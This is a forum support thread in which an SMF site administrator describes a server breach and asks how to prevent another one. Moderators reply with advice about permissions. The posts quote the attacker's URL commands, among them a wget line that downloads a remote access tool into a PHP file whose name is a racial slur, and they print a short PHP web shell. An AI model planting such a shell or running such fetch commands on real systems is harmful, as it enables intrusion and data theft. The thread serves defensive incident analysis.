Dedicated server hacked through SMF

[Maldark]

Hi there

Last night we experienced a beach through the SMF.

By tracing his steps, we've found out that he did this by manipulating the URL's parameters to run actual linux commands on our server.
For instance he ran this command index.php?page=page4836&ctime=system&atime=ls and got a list of our files in this folder. In the end he ran /index.php?page=page4836&ctime=system&atime=wget%20http:hxxp:pastebin.com/raw/ndBmTApt%20-O%20nigger.php [nonactive] which downloaded a "remote access" tool into the file nigger.php

He slowly gained more and more access, to a point where he not only had access to the SQL account that our SMF used, but also other SQL accounts that had access to ip-addresses of our players.

So my question is this; How do we prevent a user from doing such a thing?

Kind regards
Maldark

[Maldark]

By the looks of it, the hacker breached an account that (by some mistake) had rights to make "pages", this page he filled with

Code Select Expand

<?php
    @extract ($_REQUEST); 
    @die ($ctime($atime));
?>
which he in turn executed using a query like the one described in the first message. He ran the wget command as "the webserver", so he was allowed to save it in the cache folder and later executed it via GET/POST requests.

Any suggestions as to how to improve our security is much appreciated! Obviously we're fixing the rank that had the wrong privileges.

[Illori]

http://wiki.simplemachines.org/smf/Hacking_-_I_think_I_have_been_hacked

[Kindred]

Also, given that the pages function that you mention is not actually part of smf, it must have been added via a mod...

Giving anyone access to a function that grants them the ability to run php scripts is always going to be a security risk and there is not much that can be done about it...   That's why you need to be VERY careful about granting permissions